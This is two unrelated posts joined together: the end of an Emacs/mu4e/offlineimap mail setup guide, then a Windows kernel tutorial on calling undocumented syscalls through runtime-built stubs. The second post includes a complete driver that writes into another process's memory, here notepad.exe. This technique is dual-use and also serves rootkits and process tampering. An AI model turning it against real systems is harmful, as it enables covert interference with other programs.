and etc... Of course you will need to change some parameters to your own values. After this we must define the same 3 sections for Personal account, it will contain the same fields as first, like this: [Account Personal] localrepository = Personal remoterepository = Personal [Repository PersonalMailLocal] type = Maildir localfolders = ~/Maildir/Personal [Repository PersonalMailRemote] type = IMAP remotehost = imap.gmail.com remoteuser = email@gmail.com remotepass = password ssl = yes sslcacertfile = /etc/ssl/certs/ca-certificates.crt keepalive = 120 realdelete = yes holdconnectionopen = true Here we can see the same sections and fields as for first account, little difference that it configured for gmail IMAP server. After this go to you terminal and execute: mkdir -p ~/Maildir/Work mkdir -p ~/Maildir/Personal cd /home/user offlineimap It will fetches all mail from your mail servers, so you can work with it in Emacs. Emacs configuration As we have installed Emacs, mu4e and also we have configured offlineimap, we can go to Emacs configuration. First of all you need to tell Emacs where to load mu4e and enable it and smtpmail package with: (add-to-list 'load-path "/usr/local/share/emacs/site-lisp/mu4e") (require 'mu4e) (require 'smtpmail) Now we define some general variables for both accounts with: (setq ;; general mu4e-get-mail-command "offlineimap" mu4e-update-interval 300 ;; smtp message-send-mail-function 'smtpmail-send-it smtpmail-stream-type 'starttls ;; keybindings mu4e-maildir-shortcuts '(("/Personal/INBOX" . ?k) ("/Personal/[Gmail].Trash" . ?t) ("/Work/INBOX" . ?w) ("/Work/Trash" . ?f) ; attachment dir mu4e-attachment-dir "~/Downloads" ; insert sign mu4e-compose-signature-auto-include 't ) As i said here we define general parameters for our both accounts, they are program for fetching email (offlineimap in our case), updating interval, what we'll use for email sending (smtpmail in our case), maildir shortcuts (we'll describe it later), directory for attachment, and email message signature auto-inserting. Now we must add yet variables to define fields which are different for our 2 accounts: (defvar my-mu4e-account-alist '(("Personal" ;; about me (user-mail-address "user@gmail.com") (user-full-name "Name") (mu4e-compose-signature "Best regards.\n0xAX") ;; smtp (smtpmail-stream-type starttls) (smtpmail-starttls-credentials '(("smtp.gmail.com" 587 nil nil))) (smtpmail-auth-credentials '(("smtp.gmail.com" 587 "user@gmail.com" nil))) (smtpmail-default-smtp-server "smtp.gmail.com") (smtpmail-smtp-server "smtp.gmail.com") (smtpmail-smtp-service 587)) ("Work" ;; about me (user-mail-address "0xAX@work.com") (user-full-name "0xAX") (mu4e-compose-signature "0xAX") ;; smtp (smtpmail-stream-type starttls) (smtpmail-starttls-credentials '(("imap.work.net" 25 nil nil))) (smtpmail-auth-credentials '(("imap.work.net" 25 "0xAX@work.com" nil))) (smtpmail-default-smtp-server "imap.work.net") (smtpmail-smtp-service 25) ))) They are following fields: settings for you smtp servers, signatures and user info. And add one function for choosing account before message composing: ;; ;; Found here - http://www.djcbsoftware.nl/code/mu/mu4e/Multiple-accounts.html ;; (defun my-mu4e-set-account () "Set the account for composing a message." (let* ((account (if mu4e-compose-parent-message (let ((maildir (mu4e-message-field mu4e-compose-parent-message :maildir))) (string-match "/\\(.*?\\)/" maildir) (match-string 1 maildir)) (completing-read (format "Compose with account: (%s) " (mapconcat #'(lambda (var) (car var)) my-mu4e-account-alist "/")) (mapcar #'(lambda (var) (car var)) my-mu4e-account-alist) nil t nil nil (car my-mu4e-account-alist)))) (account-vars (cdr (assoc account my-mu4e-account-alist)))) (if account-vars (mapc #'(lambda (var) (set (car var) (cadr var))) account-vars) (error "No email account found")))) (add-hook 'mu4e-compose-pre-hook 'my-mu4e-set-account) Technically that's all, but you can add some more customization like date formating, image displaying and etc...: (setq message-citation-line-format "%N @ %Y-%m-%d %H:%M %Z:\n") (setq message-citation-line-function 'message-insert-formatted-citation-line) (setq mu4e-view-show-addresses 't) (setq mu4e-headers-fields '( (:date . 25) (:flags . 6) (:from . 22) (:subject . nil))) (setq mu4e-show-images t) (when (fboundp 'imagemagick-register-types) (imagemagick-register-types)) (setq mu4e-view-prefer-html t) (setq mu4e-html2text-command "html2text -utf8 -width 72") (setq mail-user-agent 'mu4e-user-agent) Usage Ok, we configured emacs, mu4e and offlineimap. Time to use it. First of all i have added keybinding for openning mu4e: (global-set-key [f1] 'mu4e) Of course you can choose another key combination. Now after pressing F1, i see mu4e main window: It is mu4e main view in Emacs. You can do following actions here: U - update email for both accounts q - exit from mu4e j-k - go to personal inbox (remember we defined keybindings in mu4e-maildir-shortcuts j-w - go to work inbox C - compose new message, it will ask you from what account you want to send message Conclusion This is the end. In this post i told how to configure Emacs + mu4e + offlineimap for email handling. As a longtime Emacs user I'm very interesting how and for what do you using Emacs, what extensions and what tasks Emacs helps to solve you, write me a comment about it. Hope this post was useful for you. Source
-
Background This post takes a different approach from the others and delves into the world of the Windows kernel. Specifically, it will cover how to access the undocumented APIs that are present within the kernel (ntoskrnl). If you trace a Windows API call from usermode to the kernel, you will find the endpoint to be something similar to what is shown below (Win 8 x64): public NtOpenFile NtOpenFile proc near 4C 8B D1 mov r10, rcx B8 31 00 00 00 mov eax, 31h 0F 05 syscall C3 retn NtOpenFile endp where the r10 register holds the value of the first argument and eax holds the index into the Windows internal syscall table. A note should be made that this is specific to a x64 operating system running a native x64 application. x86 systems rely on going through KiFastSystemCall in ntdll to achieve invoking a syscall, and WOW64 emulation relies on making transitions from x64 to x86 and back and setting up an appropriate stack in-between. When the syscall instruction executes, the flow of code will eventually find itself to NtOpenFile in ntoskrnl. This is actually a wrapper around IopCreateFile (shown below): public NtOpenFile NtOpenFile proc near 4C 8B DC mov r11, rsp 48 81 EC 88 00 00 00 sub rsp, 88h 8B 84 24 B8 00 00 00 mov eax, [rsp+88h+arg_28] 45 33 D2 xor r10d, r10d 4D 89 53 F0 mov [r11-10h], r10 C7 44 24 70 20 00 00 00 mov [rsp+88h+var_18], 20h 45 89 53 E0 mov [r11-20h], r10d 4D 89 53 D8 mov [r11-28h], r10 45 89 53 D0 mov [r11-30h], r10d 45 89 53 C8 mov [r11-38h], r10d 4D 89 53 C0 mov [r11-40h], r10 89 44 24 40 mov [rsp+88h+var_48], eax 8B 84 24 B0 00 00 00 mov eax, [rsp+88h+arg_20] C7 44 24 38 01 00 00 00 mov [rsp+88h+var_50], 1 89 44 24 30 mov [rsp+88h+var_58], eax 45 89 53 A0 mov [r11-60h], r10d 4D 89 53 98 mov [r11-68h], r10 E8 48 E2 FC FF call IopCreateFile 48 81 C4 88 00 00 00 add rsp, 88h C3 retn NtOpenFile endp Again it should be noted that there was a lot of hand-waving going on here, and that the syscall instruction does not simply invoke the native kernel API, but goes through several routines responsible for setting up trap frames and performing access checks before arriving at the native API implementation. Exported native kernel APIs for use in drivers also follow a similar, but nowhere near as complex mechanism. Every Zw* function in the kernel provides a thin wrapper around a call to the Nt* version (example shown below): NTSTATUS __stdcall ZwOpenFile(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, ULONG ShareAccess, ULONG OpenOptions) ZwOpenFile proc near 48 8B C4 mov rax, rsp FA cli 48 83 EC 10 sub rsp, 10h 50 push rax 9C pushfq 6A 10 push 10h 48 8D 05 BD 2F 00 00 lea rax, KiServiceLinkage 50 push rax B8 31 00 00 00 mov eax, 31h E9 C2 DA FF FF jmp KiServiceInternal ZwOpenFile endp This wrapper does basic things such as set up the stack, disable kernel interrupts (cli), and preserve flags. The KiServiceLinkage function is just a small stub that executes the ret instruction immediately. I have not had a chance to reverse it to see what purpose it serves — it was never even invoked when a breakpoint was set on it. Lastly, the syscall number (0x31) is put into eax and a jump to the KiServiceInternal routine is made. This routine, among other things, is responsible for setting the correct PreviousMode and traversing the Windows syscall table (commonly referred to as the System Service Dispatch Table, or SSDT) and invoking the native Nt* version of the API. Getting Access to the APIs So what is the relevance of all of this? The answer is that even though the kernel exports a ton of APIs for kernel/driver developers, there are still plenty of other ones which provide some pretty cool functionality — ones like ZwSuspendProcess/ZwResumeProcess, ZwReadVirtualMemory/ZwWriteVirtualMemory, etc, that are not available. Getting access to those APIs is really where this post begins. Before starting, there are several clear issues that need to be resolved: The base address and image size in memory of the kernel (ntoskrnl) need to be found. This is obviously because the APIs lay somewhere within that memory region. The syscalls need to be identified and there should be a generic way developed to allow us to invoke them. Other issues related to using the APIs should be addressed. For example, process enumeration in the kernel in order to get a valid process handle for the target process in a ZwSuspend/ZwResume call. Addressing these in order, the first point is relatively simple, but also relies on undocumented features. Getting the address of the kernel in memory is as simple as calling ZwQuerySystemInformation with the undocumented SYSTEM_INFORMATION_CLASS structure. What will be returned is a pointer to a SYSTEM_MODULE_INFORMATION structure containing a count of loaded modules in memory followed by the variable length array of SYSTEM_MODULE pointers. A quick note to add is that the NtInternals documentation on the structure is a bit outdated, and that the first two fields are of type ULONG_PTR instead of always a 32-bit ULONG. Finding the kernel base address and image size is simple a traversal of the SYSTEM_MODULE array and a substring search for the kernel name. The code is shown below: PSYSTEM_MODULE GetKernelModuleInfo(VOID) { PSYSTEM_MODULE SystemModule = NULL; PSYSTEM_MODULE FoundModule = NULL; ULONG_PTR SystemInfoLength = 0; PVOID Buffer = NULL; ULONG Count = 0; ULONG i = 0; ULONG j = 0; //For names for WinXP CONST CHAR *KernelNames[] = { "ntoskrnl.exe", "ntkrnlmp.exe", "ntkrnlpa.exe", "ntkrpamp.exe" }; //Perform error checking on the calls in actual code (VOID)ZwQuerySystemInformation(SystemModuleInformation, &SystemInfoLength, 0, &SystemInfoLength); Buffer = ExAllocatePool(NonPagedPool, SystemInfoLength); (VOID)ZwQuerySystemInformation(SystemModuleInformation, Buffer, SystemInfoLength, NULL); Count = ((PSYSTEM_MODULE_INFORMATION)Buffer)->ModulesCount; for(i = 0; i < Count; ++i) { SystemModule = &((PSYSTEM_MODULE_INFORMATION)Buffer)->Modules[i]; for(j = 0; j < sizeof(KernelNames) / sizeof(KernelNames[0]); ++j) { if(strstr((LPCSTR)SystemModule->Name, KernelNames[j]) != NULL) { FoundModule = (PSYSTEM_MODULE)ExAllocatePool(NonPagedPool, sizeof(SYSTEM_MODULE)); RtlCopyMemory(FoundModule, SystemModule, sizeof(SYSTEM_MODULE)); ExFreePool(Buffer); return FoundModule; } } } DbgPrint("Could not find the kernel in module list\n"); return NULL; } The above function will return the PSYSTEM_MODULE corresponding to information about the kernel (or NULL in the failure case). Now that the base address and image size of the kernel are known, it is possible to begin coming up with a way to invoke the undocumented syscalls. Since all of the undocumented Zw* calls are nearly identical wrappers (with the exception of the syscall number) invoking KiSystemService, I present the generic way of invoking these calls by creating a functionality equivalent template of this in kernel memory and executing off of that. The general idea is to create a blank template such as the one shown below: BYTE NullStub = 0xC3; BYTE SyscallTemplate[] = { 0x48, 0x8B, 0xC4, /*mov rax, rsp*/ 0xFA, /*cli*/ 0x48, 0x83, 0xEC, 0x10, /*sub rsp, 0x10*/ 0x50, /*push rax*/ 0x9C, /*pushfq*/ 0x6A, 0x10, /*push 0x10*/ 0x48, 0xB8, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, /*mov rax, NullStubAddress*/ 0x50, /*push rax*/ 0xB8, 0xBB, 0xBB, 0xBB, 0xBB, /*mov eax, Syscall*/ 0x68, 0xCC, 0xCC, 0xCC, 0xCC, /*push LowBytes*/ 0xC7, 0x44, 0x24, 0x04, 0xCC, 0xCC, 0xCC, 0xCC, /*mov [rsp+0x4], HighBytes*/ 0xC3 /*ret*/ }; in non paged memory, patch in the correct addresses (NullStub replacing KiServiceLinkage), patch in the syscall, then invoke KiSystemService (here done by moving the 64-bit absolute address on the stack and returning to it). Once fully patched at runtime, this data can simply be cased to the appropriate function pointer and invoked like normal. Here is the allocation and patching routine: PVOID CreateSyscallWrapper(IN LONG Index) { PVOID Buffer = ExAllocatePool(NonPagedPool, sizeof(SyscallTemplate)); BYTE *NullStubAddress = &NullStub; BYTE *NullStubAddressIndex = ((BYTE *)Buffer) + (14 * sizeof(BYTE)); BYTE *SyscallIndex = ((BYTE *)Buffer) + (24 * sizeof(BYTE)); BYTE *LowBytesIndex = ((BYTE *)Buffer) + (29 * sizeof(BYTE)); BYTE *HighBytesIndex = ((BYTE *)Buffer) + (37 * sizeof(BYTE)); ULONG LowAddressBytes = ((ULONG_PTR)KiSystemService) & 0xFFFFFFFF; ULONG HighAddressBytes = ((ULONG_PTR)KiSystemService >> 32); RtlCopyMemory(Buffer, SyscallTemplate, sizeof(SyscallTemplate)); RtlCopyMemory(NullStubAddressIndex, (PVOID)&NullStubAddress, sizeof(BYTE *)); RtlCopyMemory(SyscallIndex, &Index, sizeof(LONG)); RtlCopyMemory(LowBytesIndex, &LowAddressBytes, sizeof(ULONG)); RtlCopyMemory(HighBytesIndex, &HighAddressBytes, sizeof(ULONG)); return Buffer; } Example usage of this is again shown below: typedef NTSTATUS (NTAPI *pZwSuspendProcess)(IN HANDLE ProcessHandle); pZwSuspendProcess ZwSuspendProcess = (pZwSuspendProcess)CreateSyscallWrapper(0x017A, 1); //This can then be invoked as normal, e.g, ZwSuspendProcess(x); However, before doing that, the address of KiServiceInternal needs to be found so it can be properly patched in. This is, after all, partially why finding the base address of the kernel was important. This is done through scanning for the function signature through the entirely of ntoskrnl’s memory. The signature must be sufficiently long as to be unique, but preferably not so long that comparisons take a lot of time. The signature that I used for this example is shown below: typedef VOID (*pKiSystemService)(VOID); pKiSystemService KiSystemService; NTSTATUS ResolveFunctions(IN PSYSTEM_MODULE KernelInfo) { CONST BYTE KiSystemServiceSignature[] = { 0x48, 0x83, 0xEC, 0x08, 0x55, 0x48, 0x81, 0xEC, 0x58, 0x01, 0x00, 0x00, 0x48, 0x8D, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x9D, 0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0xBD, 0xC8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xB5, 0xD0, 0x00, 0x00, 0x00, 0xFB, 0x65, 0x48, 0x8B, 0x1C, 0x25, 0x88, 0x01, 0x00, 0x00 }; KiSystemService = (pKiSystemService)FindFunctionInModule(KiSystemServiceSignature, sizeof(KiSystemServiceSignature), KernelInfo->ImageBaseAddress, KernelInfo->ImageSize); if(KiSystemService == NULL) { DbgPrint("- Could not find KiSystemService\n"); return STATUS_UNSUCCESSFUL; } DbgPrint("+ Found KiSystemService at %p\n", KiSystemService); //.... } ... ... PVOID FindFunctionInModule(IN CONST BYTE *Signature, IN ULONG SignatureSize, IN PVOID KernelBaseAddress, IN ULONG ImageSize) { BYTE *CurrentAddress = 0; ULONG i = 0; DbgPrint("+ Scanning from %p to %p\n", KernelBaseAddress, (ULONG_PTR)KernelBaseAddress + ImageSize); CurrentAddress = (BYTE *)KernelBaseAddress; for(i = 0; i < ImageSize; ++i) { if(RtlCompareMemory(CurrentAddress, Signature, SignatureSize) == SignatureSize) { DbgPrint("+ Found function at %p\n", CurrentAddress); return (PVOID)CurrentAddress; } ++CurrentAddress; } return NULL; } Once the ResolveFunctions() function executes, the CreateSyscallWrapper function is ready to be used as shown above. This will now resolve any syscall that you wish to call. An Example The code below is an example I wrote up showing how to write into the virtual address space of a target process. This process is given by name to the OpenProcess function, which retrieves the appropriate EPROCESS block corresponding to the process and opens a handle to it. This handle is then used in conjunction with the undocumented APIs associated with process manipulation (ZwSuspendProcess/ZwResumeProcess) and virtual memory manipulation (ZwProtectVirtualMemory/ZwWriteVirtualMemory). An internal undocumented function (PsGetNextProcess) is also scanned for and retrieved in order to help facilitate process enumeration. The code was written for and tested on an x86 version of Windows XP SP3 and x64 Windows 7 SP1. #include "stdafx.h" #include "Undocumented.h" #include #ifdef __cplusplus extern "C" NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath); #endif pPsGetProcessImageFileName PsGetProcessImageFileName; pPsGetProcessSectionBaseAddress PsGetProcessSectionBaseAddress; pPsGetNextProcess PsGetNextProcess; pZwSuspendProcess ZwSuspendProcess; pZwResumeProcess ZwResumeProcess; pZwProtectVirtualMemory ZwProtectVirtualMemory; pZwWriteVirtualMemory ZwWriteVirtualMemory; pKiSystemService KiSystemService; #ifdef _M_IX86 __declspec(naked) VOID SyscallTemplate(VOID) { __asm { /*B8 XX XX XX XX */ mov eax, 0xC0DE /*8D 54 24 04 */ lea edx, [esp + 0x4] /*9C */ pushfd /*6A 08 */ push 0x8 /*FF 15 XX XX XX XX*/ call KiSystemService /*C2 XX XX */ retn 0xBBBB } } #elif defined(_M_AMD64) BYTE NullStub = 0xC3; BYTE SyscallTemplate[] = { 0x48, 0x8B, 0xC4, /*mov rax, rsp*/ 0xFA, /*cli*/ 0x48, 0x83, 0xEC, 0x10, /*sub rsp, 0x10*/ 0x50, /*push rax*/ 0x9C, /*pushfq*/ 0x6A, 0x10, /*push 0x10*/ 0x48, 0xB8, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, /*mov rax, NullStubAddress*/ 0x50, /*push rax*/ 0xB8, 0xBB, 0xBB, 0xBB, 0xBB, /*mov eax, Syscall*/ 0x68, 0xCC, 0xCC, 0xCC, 0xCC, /*push LowBytes*/ 0xC7, 0x44, 0x24, 0x04, 0xCC, 0xCC, 0xCC, 0xCC, /*mov [rsp+0x4], HighBytes*/ 0xC3 /*ret*/ }; #endif PVOID FindFunctionInModule(IN CONST BYTE *Signature, IN ULONG SignatureSize, IN PVOID KernelBaseAddress, IN ULONG ImageSize) { BYTE *CurrentAddress = 0; ULONG i = 0; DbgPrint("+ Scanning from %p to %p\n", KernelBaseAddress, (ULONG_PTR)KernelBaseAddress + ImageSize); CurrentAddress = (BYTE *)KernelBaseAddress; DbgPrint("+ Scanning from %p to %p\n", KernelBaseAddress, (ULONG_PTR)KernelBaseAddress + ImageSize); CurrentAddress = (BYTE *)KernelBaseAddress; for(i = 0; i < ImageSize; ++i) { if(RtlCompareMemory(CurrentAddress, Signature, SignatureSize) == SignatureSize) { DbgPrint("+ Found function at %p\n", CurrentAddress); return (PVOID)CurrentAddress; } ++CurrentAddress; } return NULL; } NTSTATUS ResolveFunctions(IN PSYSTEM_MODULE KernelInfo) { UNICODE_STRING PsGetProcessImageFileNameStr = {0}; UNICODE_STRING PsGetProcessSectionBaseAddressStr = {0}; #ifdef _M_IX86 CONST BYTE PsGetNextProcessSignature[] = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x51, 0x83, 0x65, 0xFC, 0x00, 0x56, 0x57, 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, 0x8B, 0xF0, 0xFF, 0x8E, 0xD4, 0x00, 0x00, 0x00, 0xB9, 0xC0, 0x38, 0x56, 0x80, 0xE8, 0xB4, 0xEE, 0xF6, 0xFF, 0x8B, 0x45, 0x08, 0x85, 0xC0 }; #elif defined(_M_AMD64) CONST BYTE PsGetNextProcessSignature[] = { 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C, 0x24, 0x10, 0x48, 0x89, 0x74, 0x24, 0x18, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x65, 0x48, 0x8B, 0x34, 0x25, 0x88, 0x01, 0x00, 0x00, 0x45, 0x33, 0xED, 0x48, 0x8B, 0xF9, 0x66, 0xFF, 0x8E, 0xC6, 0x01, 0x00, 0x00, 0x4D, 0x8B, 0xE5, 0x41, 0x8B, 0xED, 0x41, 0x8D, 0x4D, 0x11, 0x33, 0xC0, }; #endif #ifdef _M_IX86 CONST BYTE KiSystemServiceSignature[] = { 0x6A, 0x00, 0x55, 0x53, 0x56, 0x57, 0x0F, 0xA0, 0xBB, 0x30, 0x00, 0x00, 0x00, 0x66, 0x8E, 0xE3, 0x64, 0xFF, 0x35, 0x00, 0x00, 0x00, 0x00 }; #elif defined(_M_AMD64) CONST BYTE KiSystemServiceSignature[] = { 0x48, 0x83, 0xEC, 0x08, 0x55, 0x48, 0x81, 0xEC, 0x58, 0x01, 0x00, 0x00, 0x48, 0x8D, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x9D, 0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0xBD, 0xC8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xB5, 0xD0, 0x00, 0x00, 0x00, 0xFB, 0x65, 0x48, 0x8B, 0x1C, 0x25, 0x88, 0x01, 0x00, 0x00 }; #endif RtlInitUnicodeString(&PsGetProcessImageFileNameStr, L"PsGetProcessImageFileName"); RtlInitUnicodeString(&PsGetProcessSectionBaseAddressStr, L"PsGetProcessSectionBaseAddress"); PsGetProcessImageFileName = (pPsGetProcessImageFileName)MmGetSystemRoutineAddress(&PsGetProcessImageFileNameStr); if(PsGetProcessImageFileName == NULL) { DbgPrint("- Could not find PsGetProcessImageFileName\n"); return STATUS_UNSUCCESSFUL; } DbgPrint("+ Found PsGetProcessImageFileName at %p\n", PsGetProcessImageFileName); PsGetProcessSectionBaseAddress = (pPsGetProcessSectionBaseAddress)MmGetSystemRoutineAddress(&PsGetProcessSectionBaseAddressStr); if(PsGetProcessSectionBaseAddress == NULL) { DbgPrint("- Could not find PsGetProcessSectionBaseAddress\n"); return STATUS_UNSUCCESSFUL; } DbgPrint("+ Found PsGetProcessSectionBaseAddress at %p\n", PsGetProcessSectionBaseAddress); PsGetNextProcess = (pPsGetNextProcess)FindFunctionInModule(PsGetNextProcessSignature, sizeof(PsGetNextProcessSignature), KernelInfo->ImageBaseAddress, KernelInfo->ImageSize); if(PsGetNextProcess == NULL) { DbgPrint("- Could not find PsGetNextProcess\n"); return STATUS_UNSUCCESSFUL; } DbgPrint("+ Found PsGetNextProcess at %p\n", PsGetNextProcess); KiSystemService = (pKiSystemService)FindFunctionInModule(KiSystemServiceSignature, sizeof(KiSystemServiceSignature), KernelInfo->ImageBaseAddress, KernelInfo->ImageSize); if(KiSystemService == NULL) { DbgPrint("- Could not find KiSystemService\n"); return STATUS_UNSUCCESSFUL; } DbgPrint("+ Found KiSystemService at %p\n", KiSystemService); return STATUS_SUCCESS; } VOID OnUnload(IN PDRIVER_OBJECT DriverObject) { DbgPrint("+ Unloading\n"); } PSYSTEM_MODULE GetKernelModuleInfo(VOID) { PSYSTEM_MODULE SystemModule = NULL; PSYSTEM_MODULE FoundModule = NULL; ULONG_PTR SystemInfoLength = 0; PVOID Buffer = NULL; ULONG Count = 0; ULONG i = 0; ULONG j = 0; //Other names for WinXP CONST CHAR *KernelNames[] = { "ntoskrnl.exe", "ntkrnlmp.exe", "ntkrnlpa.exe", "ntkrpamp.exe" }; //Perform error checking on the calls in actual code (VOID)ZwQuerySystemInformation(SystemModuleInformation, &SystemInfoLength, 0, &SystemInfoLength); Buffer = ExAllocatePool(NonPagedPool, SystemInfoLength); (VOID)ZwQuerySystemInformation(SystemModuleInformation, Buffer, SystemInfoLength, NULL); Count = ((PSYSTEM_MODULE_INFORMATION)Buffer)->ModulesCount; for(i = 0; i < Count; ++i) { SystemModule = &((PSYSTEM_MODULE_INFORMATION)Buffer)->Modules[i]; for(j = 0; j < sizeof(KernelNames) / sizeof(KernelNames[0]); ++j) { if(strstr((LPCSTR)SystemModule->Name, KernelNames[j]) != NULL) { FoundModule = (PSYSTEM_MODULE)ExAllocatePool(NonPagedPool, sizeof(SYSTEM_MODULE)); RtlCopyMemory(FoundModule, SystemModule, sizeof(SYSTEM_MODULE)); ExFreePool(Buffer); return FoundModule; } } } DbgPrint("Could not find the kernel in module list\n"); return NULL; } PEPROCESS GetEPROCESSFromName(IN CONST CHAR *ImageName) { PEPROCESS ProcessHead = PsGetNextProcess(NULL); PEPROCESS Process = PsGetNextProcess(NULL); CHAR *ProcessName = NULL; do { ProcessName = PsGetProcessImageFileName(Process); DbgPrint("+ Currently looking at %s\n", ProcessName); if(strstr(ProcessName, ImageName) != NULL) { DbgPrint("+ Found the process -- %s\n", ProcessName); return Process; } Process = PsGetNextProcess(Process); } while(Process != NULL && Process != ProcessHead); DbgPrint("- Could not find %s\n", ProcessName); return NULL; } HANDLE GetProcessIdFromEPROCESS(PEPROCESS Process) { return PsGetProcessId(Process); } HANDLE OpenProcess(IN CONST CHAR *ProcessName, OUT OPTIONAL PEPROCESS *pProcess) { HANDLE ProcessHandle = NULL; CLIENT_ID ClientId = {0}; OBJECT_ATTRIBUTES ObjAttributes = {0}; PEPROCESS EProcess = GetEPROCESSFromName(ProcessName); NTSTATUS Status = STATUS_UNSUCCESSFUL; if(EProcess == NULL) { return NULL; } InitializeObjectAttributes(&ObjAttributes, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); ObjAttributes.ObjectName = NULL; ClientId.UniqueProcess = GetProcessIdFromEPROCESS(EProcess); ClientId.UniqueThread = NULL; Status = ZwOpenProcess(&ProcessHandle, PROCESS_ALL_ACCESS, &ObjAttributes, &ClientId); if(!NT_SUCCESS(Status)) { DbgPrint("- Could not open process %s. -- %X\n", ProcessName, Status); return NULL; } if(pProcess != NULL) { *pProcess = EProcess; } return ProcessHandle; } PVOID CreateSyscallWrapper(IN LONG Index, IN SHORT NumParameters) { #ifdef _M_IX86 SIZE_T StubLength = 0x15; PVOID Buffer = ExAllocatePool(NonPagedPool, StubLength); BYTE *SyscallIndex = ((BYTE *)Buffer) + sizeof(BYTE); BYTE *Retn = ((BYTE *)Buffer) + (0x13 * (sizeof(BYTE))); RtlCopyMemory(Buffer, SyscallTemplate, StubLength); NumParameters = NumParameters * sizeof(ULONG_PTR); RtlCopyMemory(SyscallIndex, &Index, sizeof(LONG)); RtlCopyMemory(Retn, &NumParameters, sizeof(SHORT)); return Buffer; #elif defined(_M_AMD64) PVOID Buffer = ExAllocatePool(NonPagedPool, sizeof(SyscallTemplate)); BYTE *NullStubAddress = &NullStub; BYTE *NullStubAddressIndex = ((BYTE *)Buffer) + (14 * sizeof(BYTE)); BYTE *SyscallIndex = ((BYTE *)Buffer) + (24 * sizeof(BYTE)); BYTE *LowBytesIndex = ((BYTE *)Buffer) + (29 * sizeof(BYTE)); BYTE *HighBytesIndex = ((BYTE *)Buffer) + (37 * sizeof(BYTE)); ULONG LowAddressBytes = ((ULONG_PTR)KiSystemService) & 0xFFFFFFFF; ULONG HighAddressBytes = ((ULONG_PTR)KiSystemService >> 32); RtlCopyMemory(Buffer, SyscallTemplate, sizeof(SyscallTemplate)); RtlCopyMemory(NullStubAddressIndex, (PVOID)&NullStubAddress, sizeof(BYTE *)); RtlCopyMemory(SyscallIndex, &Index, sizeof(LONG)); RtlCopyMemory(LowBytesIndex, &LowAddressBytes, sizeof(ULONG)); RtlCopyMemory(HighBytesIndex, &HighAddressBytes, sizeof(ULONG)); return Buffer; #endif } VOID InitializeSyscalls(VOID) { #ifdef _M_IX86 ZwSuspendProcess = (pZwSuspendProcess)CreateSyscallWrapper(0x00FD, 1); ZwResumeProcess = (pZwResumeProcess)CreateSyscallWrapper(0x00CD, 1); ZwProtectVirtualMemory = (pZwProtectVirtualMemory)CreateSyscallWrapper(0x0089, 5); ZwWriteVirtualMemory = (pZwWriteVirtualMemory)CreateSyscallWrapper(0x0115, 5); #elif defined(_M_AMD64) ZwSuspendProcess = (pZwSuspendProcess)CreateSyscallWrapper(0x017A, 1); ZwResumeProcess = (pZwResumeProcess)CreateSyscallWrapper(0x0144, 1); ZwProtectVirtualMemory = (pZwProtectVirtualMemory)CreateSyscallWrapper(0x004D, 5); ZwWriteVirtualMemory = (pZwWriteVirtualMemory)CreateSyscallWrapper(0x0037, 5); #endif } VOID FreeSyscalls(VOID) { ExFreePool(ZwSuspendProcess); ExFreePool(ZwResumeProcess); ExFreePool(ZwProtectVirtualMemory); ExFreePool(ZwWriteVirtualMemory); } PVOID GetProcessBaseAddress(IN PEPROCESS Process) { return PsGetProcessSectionBaseAddress(Process); } NTSTATUS WriteToProcessAddress(IN HANDLE ProcessHandle, IN PVOID BaseAddress, IN BYTE *NewBytes, IN SIZE_T NewBytesSize) { ULONG OldProtections = 0; SIZE_T BytesWritten = 0; SIZE_T NumBytesToProtect = NewBytesSize; NTSTATUS Status = STATUS_UNSUCCESSFUL; //Needs error checking Status = ZwSuspendProcess(ProcessHandle); Status = ZwProtectVirtualMemory(ProcessHandle, &BaseAddress, &NumBytesToProtect, PAGE_EXECUTE_READWRITE, &OldProtections); Status = ZwWriteVirtualMemory(ProcessHandle, BaseAddress, NewBytes, NewBytesSize, &BytesWritten); Status = ZwProtectVirtualMemory(ProcessHandle, &BaseAddress, &NumBytesToProtect, OldProtections, &OldProtections); Status = ZwResumeProcess(ProcessHandle); return STATUS_SUCCESS; } NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) { PSYSTEM_MODULE KernelInfo = NULL; PEPROCESS Process = NULL; HANDLE ProcessHandle = NULL; PVOID BaseAddress = NULL; BYTE NewBytes[0x100] = {0}; NTSTATUS Status = STATUS_UNSUCCESSFUL; DbgPrint("+ Driver successfully loaded\n"); DriverObject->DriverUnload = OnUnload; KernelInfo = GetKernelModuleInfo(); if(KernelInfo == NULL) { DbgPrint("Could not find kernel module\n"); return STATUS_UNSUCCESSFUL; } DbgPrint("+ Found kernel module.\n" "+ Name: %s -- Base address: %p -- Size: %p\n", KernelInfo->Name, KernelInfo->ImageBaseAddress, KernelInfo->ImageSize); if(!NT_SUCCESS(ResolveFunctions(KernelInfo))) { return STATUS_UNSUCCESSFUL; } InitializeSyscalls(); ProcessHandle = OpenProcess("notepad.exe", &Process); if(ProcessHandle == NULL) { return STATUS_UNSUCCESSFUL; } BaseAddress = GetProcessBaseAddress(Process); if(BaseAddress == NULL) { return STATUS_UNSUCCESSFUL; } DbgPrint("Invoking\n"); RtlFillMemory(NewBytes, sizeof(NewBytes), 0x90); (VOID)WriteToProcessAddress(ProcessHandle, BaseAddress, NewBytes, sizeof(NewBytes)); DbgPrint("+ Done\n"); ExFreePool(KernelInfo); 